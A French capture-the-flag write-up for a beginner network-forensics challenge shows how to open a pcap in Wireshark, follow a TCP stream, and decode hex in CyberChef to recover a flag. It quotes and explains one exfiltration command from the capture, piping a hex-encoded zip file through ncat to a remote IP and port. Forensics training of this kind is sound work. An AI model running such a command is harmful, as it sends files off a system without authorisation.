Solution de richardform2 pour Cap ou Pcap

intro forensics réseau

3 janvier 2025

Table des matières

Étapes

  1. Télécharger le fichier cap.pcap.
  2. L’ouvrir avec Wireshark.
  3. Chercher la trame qui nous intéresse.
  4. Récupérer les données.
  5. Les convertir.
  6. Reconstituer le fichier.

1) Télécharger le fichier cap.pcap

Il faut télécharger le fichier dans un répertoire temporaire accessible.

2) L’ouvrir avec Wireshark

Visuel ouverture du fichier

Wireshark

3) Chercher la trame qui nous intéresse

Nous remarquons des commandes shell.

Commande shell

En suivant, nous remarquons la commande ls qui liste les documents dans le répertoire Documents :

Liste des documents

Un fichier flag.zip est présent dans ce répertoire.

Dans la continuité, une commande est présente dans une trame :

Commande trouvée 

xxd -p Documents/flag.zip | tr -d '
' | ncat 172.20.20.133 20200
  • xxd -p Documents/flag.zip : Convertit le contenu binaire du fichier en une représentation hexadécimale simple (texte).
  • tr -d ' ' : Supprime tous les caractères de nouvelle ligne du flux de sortie, rendant la représentation hexadécimale continue.
  • ncat 172.20.20.133 20200 : Utilise ncat pour envoyer le flux traité à l’adresse IP 172.20.20.133 sur le port 20200.

4) Récupérer les données

Pour finir, nous trouvons les données transmises dans la trame suivante :

Trame suivante

Il faut sélectionner la trame et effectuer un clic droit pour accéder à :

Suivre > TCP Stream

Suivre le stream

Nous sélectionnons “Afficher les données comme ASCII” et récupérons les données :

Données récupérées

5) Les convertir

Pour convertir les données, nous utilisons le site CyberChef :

https://gchq.github.io/CyberChef/

  1. Sélectionner From HEX et Extract Files.

Conversion dans CyberChef

  1. Insérer les données copiées dans INPUT et récupérer le fichier dans OUTPUT :

Output CyberChef

6) Reconstituer le fichier

Le fichier contient un fichier texte qui, une fois édité, nous donne le flag !

Flag trouvé

Flag affiché